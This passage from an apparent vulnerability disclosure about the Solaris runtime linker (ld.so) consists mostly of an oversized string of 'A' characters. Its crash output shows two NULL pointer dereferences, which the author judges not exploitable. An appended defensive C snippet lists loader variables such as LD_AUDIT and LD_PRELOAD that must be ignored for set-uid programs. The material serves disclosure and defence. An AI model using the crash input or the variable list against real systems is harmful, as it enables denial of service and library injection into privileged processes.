AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: audit initialization failure: disabled
    Segmentation fault

Both of them are NULL pointer dereferences. The first example works on Solaris 8, 9 and 10; the second one only on Solaris 10. For now, it doesn't seem to be exploitable.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
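An added illustration, not part of Frasunek's post or of Sun's ld.so: the policy the vulnerable ld.so builds skip, written as a user-space routine. A runtime linker starting a set-uid or set-gid process must ignore environment variables that name code to load, so LD_AUDIT cannot inject a library into the privileged process. The variable list and function names here are assumptions for the example, not Solaris' actual table.

```c
/* Added example, not from the original post: the policy the vulnerable
 * ld.so builds skip. When a set-uid/set-gid process starts, the runtime
 * linker must ignore environment variables that name code to load, so
 * LD_AUDIT cannot inject a library into the privileged process. */
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Variables that would let the caller load code or redirect library search.
 * Illustrative list, not Solaris' exact table. */
static const char *const unsafe_ld_vars[] = {
    "LD_AUDIT", "LD_AUDIT_32", "LD_AUDIT_64",
    "LD_PRELOAD", "LD_PRELOAD_32", "LD_PRELOAD_64",
    "LD_LIBRARY_PATH", "LD_LIBRARY_PATH_32", "LD_LIBRARY_PATH_64",
    NULL
};

/* Nonzero if a "NAME=value" entry names one of the unsafe variables. */
int is_unsafe_ld_var(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t namelen = eq ? (size_t)(eq - entry) : strlen(entry);
    for (const char *const *p = unsafe_ld_vars; *p; p++)
        if (strlen(*p) == namelen && strncmp(entry, *p, namelen) == 0)
            return 1;
    return 0;
}

/* "Secure" means real and effective ids differ: the binary was set-uid or
 * set-gid, which is what ld.so learns from AT_SECURE / issetugid(). */
int env_is_secure(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

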